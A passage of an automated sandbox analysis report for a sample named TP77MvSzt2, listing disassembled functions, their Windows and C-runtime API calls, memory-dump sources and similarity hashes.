• Instruction Fuzzy Hash: 3CC1E270E04249AFDB52DFACC844BADBBB1AF09314F044A99ED16E7392D770A941CB61
APIs
  • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
  • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
  • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
• _memcmp.LIBVCRUNTIME ref: 0043118C
• _free.LIBCMT ref: 004311FD
• _free.LIBCMT ref: 00431216
• _free.LIBCMT ref: 00431248
• _free.LIBCMT ref: 00431251
• _free.LIBCMT ref: 0043125D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: _free$ErrorLast$_memcmp
• String ID: 11@
• API String ID: 4275183328-1785270423
• Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
• Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
• Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
• Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
APIs
  • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
  • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
  • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
• _free.LIBCMT ref: 04861464
• _free.LIBCMT ref: 0486147D
• _free.LIBCMT ref: 048614AF
• _free.LIBCMT ref: 048614B8
• _free.LIBCMT ref: 048614C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast
• String ID: 11@$C
• API String ID: 3291180501-2085848483
• Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction ID: 46addebdd64163730ab5f763531d7e315cd45ac935c498f0c46a63de363367d8
• Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
• Instruction Fuzzy Hash: 52B12975A012199FDB64DF18C888AADB7B5FF08304F504AAAD94AE7351E771BE90CF40
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 04853071
  • Part of subcall function 04848AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 04848ADD
• SafeSQueue.LIBCONCRT ref: 0485308A
• Concurrency::location::_Assign.LIBCMT ref: 0485314A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0485316B
• __CxxThrowException@8.LIBVCRUNTIME ref: 04853179
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID: 11@
• API String ID: 3496964030-1785270423
• Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
• Instruction ID: 202d8ffac088b729d1ea38db2d6dd306a2f92909be088c441309f229f88553af
• Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
• Instruction Fuzzy Hash: F5310231600A159FDB25FF79C840A6ABBA0FF44754F004A69ED06CB2A1DB70F845CBC2
APIs
• atomic_compare_exchange.LIBCONCRT ref: 0484C6FC
• atomic_compare_exchange.LIBCONCRT ref: 0484C720
• std::_Cnd_initX.LIBCPMT ref: 0484C731
• std::_Cnd_initX.LIBCPMT ref: 0484C73F
  • Part of subcall function 04831370: __Mtx_unlock.LIBCPMT ref: 04831377
• std::_Cnd_initX.LIBCPMT ref: 0484C74F
  • Part of subcall function 0484C40F: __Cnd_broadcast.LIBCPMT ref: 0484C416
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0484C75D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
• String ID: 11@
• API String ID: 4258476935-1785270423
• Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
• Instruction ID: 0d582ab0785107990eb90bc7a4ac78f7389aaad53b47a0dc50a0052de3344050
• Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
• Instruction Fuzzy Hash: AB01D475901609A7EB10BB688D44BADB35CAF41318F140A11E900D7680EBF8FB0586D3
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-316725708
• Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
• Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
• Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
• Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
• __alloca_probe_16.LIBCMT ref: 004321E6
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
• __alloca_probe_16.LIBCMT ref: 004322CB
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
• __freea.LIBCMT ref: 0043233B
  • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
• __freea.LIBCMT ref: 00432344
• __freea.LIBCMT ref: 00432369
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
• Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
• Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
• Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
• Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
APIs
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
• Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
• Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
APIs
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction ID: 3b6a38ac24665091ca69384c842925cc8dbb8fb3b2d0a0aa9165096d291e0ffd
• Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
• Instruction Fuzzy Hash: 96610371A00205AFDBA4CF6CC841B9ABBF5EB06710F104AAAED46FB344E771B9419B51
APIs
• GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
• __fassign.LIBCMT ref: 00433960
• __fassign.LIBCMT ref: 0043397B
• WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
• WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
• WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
• Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
• Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
• Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
APIs
• GetConsoleCP.KERNEL32(?,0485C4C4,E0830C40,?,?,?,?,?,?,0486427F,0483E061,0485C4C4,?,0485C4C4,0485C4C4,0483E061), ref: 04863B4C
• __fassign.LIBCMT ref: 04863BC7
• __fassign.LIBCMT ref: 04863BE2
• WideCharToMultiByte.KERNEL32(?,00000000,0485C4C4,00000001,?,00000005,00000000,00000000), ref: 04863C08
• WriteFile.KERNEL32(?,?,00000000,0486427F,00000000,?,?,?,?,?,?,?,?,?,0486427F,0483E061), ref: 04863C27
• WriteFile.KERNEL32(?,0483E061,00000001,0486427F,00000000,?,?,?,?,?,?,?,?,?,0486427F,0483E061), ref: 04863C60
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
• Instruction ID: b220f43f5cffa7da8901d7bf7f91a155a0764be0dcf7043315f3de0bb2eb13ce
• Opcode Fuzzy Hash: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
• Instruction Fuzzy Hash: CC51E975E00209AFDB10CFA8DC84AEEBBF8EF49700F14461AE956E7291E730A551CB61
APIs
• _SpinWait.LIBCONCRT ref: 0484B172
  • Part of subcall function 048411A8: _SpinWait.LIBCONCRT ref: 048411C0
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0484B186
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0484B1B8
• List.LIBCMT ref: 0484B23B
• List.LIBCMT ref: 0484B24A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID: 6+A
• API String ID: 3281396844-2819411039
• Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
• Instruction ID: ce8b2d0dbac40ef19e738c3b1c71b3f30159478b734645e2ed0fe3b2b380681d
• Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
• Instruction Fuzzy Hash: 75317C31E0576DDFDB14EFA8D5906DDBBB1BF85308F040A6AC801A7650DBB1B914CB92
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
• Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                  • Instruction ID: b1afa3ff35589a55914ce993ba866f705f8f551168ca6a2efa5445298634ce1b
                                                                                  • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                  • Instruction Fuzzy Hash: DA110631605229BFEB202F7AAC44D6B7A9CEF86765B100F24FE16C7250DA74E900D6A1
                                                                                  APIs
                                                                                    • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                                                  • _free.LIBCMT ref: 0043A3F1
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043A3FC
                                                                                  • _free.LIBCMT ref: 0043A407
                                                                                  • _free.LIBCMT ref: 0043A45B
                                                                                  • _free.LIBCMT ref: 0043A466
                                                                                  • _free.LIBCMT ref: 0043A471
                                                                                  • _free.LIBCMT ref: 0043A47C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                                                  APIs
                                                                                    • Part of subcall function 0486A351: _free.LIBCMT ref: 0486A37A
                                                                                  • _free.LIBCMT ref: 0486A658
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A663
                                                                                  • _free.LIBCMT ref: 0486A66E
                                                                                  • _free.LIBCMT ref: 0486A6C2
                                                                                  • _free.LIBCMT ref: 0486A6CD
                                                                                  • _free.LIBCMT ref: 0486A6D8
                                                                                  • _free.LIBCMT ref: 0486A6E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction ID: dbce35dcdf86dd0971630514a4eea0838b63cfde4ef3e34c21a0118b09b364e3
                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                  • Instruction Fuzzy Hash: AF11E171440B04ABEAA1BBBDCC46FCB779DEF01344F440E18B29BF6150DAE2F0104622
                                                                                  APIs
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
                                                                                  • GetLastError.KERNEL32 ref: 00412426
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
                                                                                  • GetLastError.KERNEL32 ref: 0041245D
                                                                                  • GetLastError.KERNEL32 ref: 0041246F
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 4227777306-0
                                                                                  • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                  • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                                                  • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                  • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                                                  APIs
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 04842687
                                                                                  • GetLastError.KERNEL32 ref: 0484268D
                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 048426BA
                                                                                  • GetLastError.KERNEL32 ref: 048426C4
                                                                                  • GetLastError.KERNEL32 ref: 048426D6
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048426EC
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048426FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 4227777306-0
                                                                                  • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                  • Instruction ID: 82509892218979575461b7daff8477d3c7cb89d8b5b38a62f34be7e0dd1e9d8e
                                                                                  • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                  • Instruction Fuzzy Hash: 0F01F73460411DA7EB10BF65EC48BAF3768EF82AD6B500E66F405E3060EB64F50497A9
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0484672B), ref: 048424D6
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 048424E4
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 048424F2
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0484672B), ref: 04842520
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04842527
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 04842542
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 0484254E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842564
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 4179531150-1793498882
                                                                                  • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                  • Instruction ID: d2ccf1c1577a0dbbd7a7c197948702cc814c5e56003dc1a623e7c677e6d030e1
                                                                                  • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                  • Instruction Fuzzy Hash: 90F0F4769043103FF6107B797C8992A7FACDD86A633210B76F811D22E1EF74D540866C
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: 11@$CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-3445089953
                                                                                  • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                  • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                                                  • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                  • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0486260C,00000001,00000001,?), ref: 04862415
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0486260C,00000001,00000001,?,?,?,?), ref: 0486249B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04862595
                                                                                  • __freea.LIBCMT ref: 048625A2
                                                                                    • Part of subcall function 0486392E: RtlAllocateHeap.NTDLL(00000000,0483DAFC,00000000), ref: 04863960
                                                                                  • __freea.LIBCMT ref: 048625AB
                                                                                  • __freea.LIBCMT ref: 048625D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                  • Instruction ID: 7660c76a44a2c8fec8a5b9e08d7d38eeba9444a622a03b9e49a5e58277fd62e7
                                                                                  • Opcode Fuzzy Hash: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                  • Instruction Fuzzy Hash: 48513472610206AFEBB4AF28CC95EAF77AAEB40754F144BE8FD06D6040EB74E840C751
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID:
                                                                                  • API String ID: 4189289331-0
                                                                                  • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                  • Instruction ID: 3fd2401633ff3c48e385cf4babe0fb42190b579df41d288730e4579a5643330b
                                                                                  • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                  • Instruction Fuzzy Hash: EC511772900605ABEB249F6CCC81FBE77E9AF49364F104B19EC19D61A1EB71F600C665
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                  • String ID:
                                                                                  • API String ID: 1687354797-0
                                                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction ID: f5eddfdf6787db06b204784323e0d9cdd2b76d569b153cfeab631d1c4a905f5a
                                                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction Fuzzy Hash: 68219971C04248AAEF15ABACD8447DE77F89F0931AF144A19D500F7240DBB5B644C7A6
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,FE93531E), ref: 00428E08
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
